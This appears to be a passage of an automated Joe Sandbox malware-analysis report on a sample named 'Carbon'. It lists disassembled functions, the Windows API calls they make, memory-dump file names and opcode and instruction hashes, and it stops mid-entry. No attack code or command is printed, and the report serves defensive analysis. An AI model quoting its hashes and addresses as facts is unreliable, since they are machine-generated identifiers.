                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen
                                                            • String ID: X
                                                            • API String ID: 779396738-3081909835
                                                            • Opcode ID: 015a61cb507a773ec57ada20a528b2c067153ed7bee61a0a64bbc1d0ebf9bf9d
                                                            • Instruction ID: 3d194c5e0f09f1fe2e1f8b9ac75b6825a8ecd1bcb9d3e097e6a0cfd9494002d9
                                                            • Opcode Fuzzy Hash: 015a61cb507a773ec57ada20a528b2c067153ed7bee61a0a64bbc1d0ebf9bf9d
                                                            • Instruction Fuzzy Hash: 0F218470A1424C9BCB159FA8C805BEEBBF9EF48315F008019E505F7241DBB45A898F62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F9E60 Relevance: 3.2, APIs: 2, Instructions: 236fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadFile.KERNEL32(?,00000000,00010000,?,00000000,00000002,?,00000001,?,?,008F9DE6,?,?,?), ref: 008F9FAC
                                                            • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000002,?,00000001,?,?,008F9DE6,?,?,?), ref: 0093F6F4
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: File$PointerRead
                                                            • String ID:
                                                            • API String ID: 3154509469-0
                                                            • Opcode ID: ef10d559fa6670b324d3b90b74bd089fe8f1271246b57641bb7602f7a70f5f67
                                                            • Instruction ID: 11f80cb7cb69af090871985636d34a391c82a9868da8c8ec490e65846dc4c13b
                                                            • Opcode Fuzzy Hash: ef10d559fa6670b324d3b90b74bd089fe8f1271246b57641bb7602f7a70f5f67
                                                            • Instruction Fuzzy Hash: A191DF70A08209EBDF00CF64C881BB9BBB4FF05314F1481A5E995DB285D776D981DB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F3989 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008F3A5A
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            • Opcode ID: c40b68a1023eec4b98a95f1862ee1b1a2c72a6f1b18564ec1a278d209f146a16
                                                            • Instruction ID: 6fa19cd6bd9b4f488f7c24d0d4df1d002b160977d3c5cb4f5e94c1d6e0573c97
                                                            • Opcode Fuzzy Hash: c40b68a1023eec4b98a95f1862ee1b1a2c72a6f1b18564ec1a278d209f146a16
                                                            • Instruction Fuzzy Hash: D8316F706187458FD720DF35D885BA7BBE8FB49708F00082DE6D9C6290E7B5AA44CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F5E02 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,008F32FC,?,00008000), ref: 008F5E30
                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,008F32FC,?,00008000), ref: 009349F8
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: ccf932cbfd24555e4c9136ce24c0786077fe2e92b853dd6180bfe0bd93ce8a11
                                                            • Instruction ID: 5c875ecb26156296c770aa908ac6f19f478779dea66483022179259928542287
                                                            • Opcode Fuzzy Hash: ccf932cbfd24555e4c9136ce24c0786077fe2e92b853dd6180bfe0bd93ce8a11
                                                            • Instruction Fuzzy Hash: 9201753114A229B6E3701A6ACC0EFA77F98EF02774F118305FF99AA1E0C7B45954DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00921D7C Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0092D191: GetEnvironmentStringsW.KERNEL32 ref: 0092D195
                                                            • _free.LIBCMT ref: 00921DBD
                                                            • _free.LIBCMT ref: 00921DC4
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _free$EnvironmentStrings
                                                            • String ID:
                                                            • API String ID: 3523873077-0
                                                            • Opcode ID: 389af3543cb5d2be6040a561f9e1fc33a8d076b9500c49cb42db4acb017a57be
                                                            • Instruction ID: 570f4779069d20525b9e1dd0d3a0a52fd221f7be7e60aaa59de664b1fd92b53c
                                                            • Opcode Fuzzy Hash: 389af3543cb5d2be6040a561f9e1fc33a8d076b9500c49cb42db4acb017a57be
                                                            • Instruction Fuzzy Hash: 3DE02B22E49D3166A37662393C11F6A024C4FD2330BA2071AFC21C70CFCD14889101DA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F7731 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,008F9DF5,?,?,?), ref: 008F7750
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,008F9DF5,?,?,?), ref: 008F7786
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide
                                                            • String ID:
                                                            • API String ID: 626452242-0
                                                            • Opcode ID: fef44dfd5561cdc9ec4f651ce890d7ecc151a470792a8d4399c91a1c692f54f0
                                                            • Instruction ID: d95ab79a991b43fa1148c25fe1f8421316cb73b563eef25688795c2e2921db1d
                                                            • Opcode Fuzzy Hash: fef44dfd5561cdc9ec4f651ce890d7ecc151a470792a8d4399c91a1c692f54f0
                                                            • Instruction Fuzzy Hash: 4D01D4713191087FFB1867799C4BF7F7AADDF85710F10003EB206DA2E0E9A09C409621
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008FB940 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __Init_thread_footer.LIBCMT ref: 008FBD7E
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID:
                                                            • API String ID: 1385522511-0
                                                            • Opcode ID: 7a3d88acac9280fe6780332666c56fb8624ba58937a1518f620c0b0b90d26c83
                                                            • Instruction ID: f080c821503f256d6da8ae9f94603dd246fb472eaded5d4385d5fb2c7c39f3ea
                                                            • Opcode Fuzzy Hash: 7a3d88acac9280fe6780332666c56fb8624ba58937a1518f620c0b0b90d26c83
                                                            • Instruction Fuzzy Hash: 5932AC75A0020DDFDB20DF68C884EBAB7B9FF84314F158059EA06AB291D775EE41CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008FA400 Relevance: 1.9, APIs: 1, Instructions: 394COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 19e7de32466b7d9d2f6b962cc6fcfe41fa9e776783c3d4752112445b56cdf415
                                                            • Instruction ID: 6201ee35d1f1e339d35ffa468c19ff166ee4c1839d15a7284cbbf1e2f714a315
                                                            • Opcode Fuzzy Hash: 19e7de32466b7d9d2f6b962cc6fcfe41fa9e776783c3d4752112445b56cdf415
                                                            • Instruction Fuzzy Hash: A6E1D1B1A1021D9BCF18DFA8C850AFDB7B5FF18320F544126EA1AE7290E734D951CB56
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0091F0E6 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8f7b7409125f4e6dcbe1339ace1207b6b9385a3940216631eac6e6bbe7a3dc47
                                                            • Instruction ID: d8569a9802b327dce62621ce6c32dc1f8c3c7975840ea60952c784dbaca5d001
                                                            • Opcode Fuzzy Hash: 8f7b7409125f4e6dcbe1339ace1207b6b9385a3940216631eac6e6bbe7a3dc47
                                                            • Instruction Fuzzy Hash: 2951B975B0410CAFDB10DF58C864BE97BB5EF86364F198668E8189B391C771ED82CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F6B3F Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(008FA6A5,55CB840F,55CB8410,00000000,00000001,?,008FA6A5,?,00000001,?,?,?,00000000), ref: 008F6BC8
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID:
                                                            • API String ID: 3964851224-0
                                                            • Opcode ID: 5c9c57e09ced60d3e41a9ed82f9762196ef48d8f22cf0b114f8862eb23beb1d1
                                                            • Instruction ID: d0866fc727b0a7bd7a00ed871abe0199212a0470b7ce34e7e3e23e779c89cd19
                                                            • Opcode Fuzzy Hash: 5c9c57e09ced60d3e41a9ed82f9762196ef48d8f22cf0b114f8862eb23beb1d1
                                                            • Instruction Fuzzy Hash: 8341C37560410EABCB189F38C555A797761FF84774B64422AEA1ACB3A1FB31EC70CB42
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095F9DF Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?), ref: 0095F9F8
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower
                                                            • String ID:
                                                            • API String ID: 2358735015-0
                                                            • Opcode ID: f6f0f44bcf610430b78a63a1ca82ffd96c95752961c6d08b5d05fae1bdb8c73e
                                                            • Instruction ID: 190411839db93ac364c909361a4dd51e91e1e6add880bc83250a648065c17c02
                                                            • Opcode Fuzzy Hash: f6f0f44bcf610430b78a63a1ca82ffd96c95752961c6d08b5d05fae1bdb8c73e
                                                            • Instruction Fuzzy Hash: F541B472A00209AFCB11DF69D8919AEB3B8FF84361F11453AE91AD7241EB70DE48CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F54DE Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008F54A3: LoadLibraryA.KERNEL32(kernel32.dll,?,?,008F54F0,?,?,008F5184,?,00000001,?,?,00000000), ref: 008F54AF
                                                              • Part of subcall function 008F54A3: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008F54C1
                                                              • Part of subcall function 008F54A3: FreeLibrary.KERNEL32(00000000,?,?,008F54F0,?,?,008F5184,?,00000001,?,?,00000000), ref: 008F54D3
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,008F5184,?,00000001,?,?,00000000), ref: 008F5510
                                                              • Part of subcall function 008F546C: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0093466F,?,?,008F5184,?,00000001,?,?,00000000), ref: 008F5475
                                                              • Part of subcall function 008F546C: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008F5487
                                                              • Part of subcall function 008F546C: FreeLibrary.KERNEL32(00000000,?,?,0093466F,?,?,008F5184,?,00000001,?,?,00000000), ref: 008F549A
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressFreeProc
                                                            • String ID:
                                                            • API String ID: 2632591731-0
                                                            • Opcode ID: e0eb100bb9b7914cf89df6898c3558b9008b78419dd083ac67743eb3ab3bffe6
                                                            • Instruction ID: c77eef853933bf8b5c4ecf1beea89c95db7423ccf8f0006edd603bf56fe91e5b
                                                            • Opcode Fuzzy Hash: e0eb100bb9b7914cf89df6898c3558b9008b78419dd083ac67743eb3ab3bffe6
                                                            • Instruction Fuzzy Hash: F5112732700A0DAACB10BF38CC02BBD77A5FF94711F104429F782EA1C1EE749A459B55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00928752 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: __wsopen_s
                                                            • String ID:
                                                            • API String ID: 3347428461-0
                                                            • Opcode ID: f6b6e46917ff5b04a6b8df4917082c948e45495df7860e1ad2f8fcabe4222fcd
                                                            • Instruction ID: b3261aca4735d9146e6070c66cf59200806456d34af6594a07b36289351567c0
                                                            • Opcode Fuzzy Hash: f6b6e46917ff5b04a6b8df4917082c948e45495df7860e1ad2f8fcabe4222fcd
                                                            • Instruction Fuzzy Hash: CD112A7590420AAFCF05DF58E941E9B7BF9EF49310F104499F809AB311EA31DE21CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F9FE0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadFile.KERNEL32(?,?,00010000,00000000,00000000,?,?,00000000,?,008F5B20,?,00010000,00000000,00000000,00000000,00000000), ref: 008FA03C
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: f241f92bcf5301eccb897d3cfa6633d052135a5722432b733c27b3c1c6b6bb71
                                                            • Instruction ID: 6726bbac017a25c48a4079824f34985ed63d99137aceea2e34f5f7d6c08875c7
                                                            • Opcode Fuzzy Hash: f241f92bcf5301eccb897d3cfa6633d052135a5722432b733c27b3c1c6b6bb71
                                                            • Instruction Fuzzy Hash: 05116A71204B08EFD7248F25E480B62B7E8FF84364F14C42DE69A87A80CB71F844DB21
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F19A9 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008F27FA,009C2408,?,?,?,?,?,?,?,008F1727,?), ref: 008F19EA
                                                              • Part of subcall function 008F7467: _wcslen.LIBCMT ref: 008F747A
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: FullNamePath_wcslen
                                                            • String ID:
                                                            • API String ID: 4019309064-0
                                                            • Opcode ID: 1814c3aa845428294ce3f6852b34052e1b4b43ef79cf292f79a4ece477701d99
                                                            • Instruction ID: d8214aaf1d63bb15b070c2536313328f02d12e7cec86ff974ddd4ed353b1ea9d
                                                            • Opcode Fuzzy Hash: 1814c3aa845428294ce3f6852b34052e1b4b43ef79cf292f79a4ece477701d99
                                                            • Instruction Fuzzy Hash: EC11CE31A0522C9B9F05EBB48846EE9B7F8FF58344F0040A5B645E3290EE7097848B22
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0091E952 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b78347c3af4faeddaf6041936be61502238db1ea0e0acd99a45db38c25bd97f7
                                                            • Instruction ID: 24b9094aa5d70f2609e63957cb0c7271fdf368927d2513cb0b0b48e0916a8030
                                                            • Opcode Fuzzy Hash: b78347c3af4faeddaf6041936be61502238db1ea0e0acd99a45db38c25bd97f7
                                                            • Instruction Fuzzy Hash: 21F0CD3660162866D6313B269C05BDA335C9FC3334F100B15FC65971D1DB74D54586D5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008FA1D4 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID:
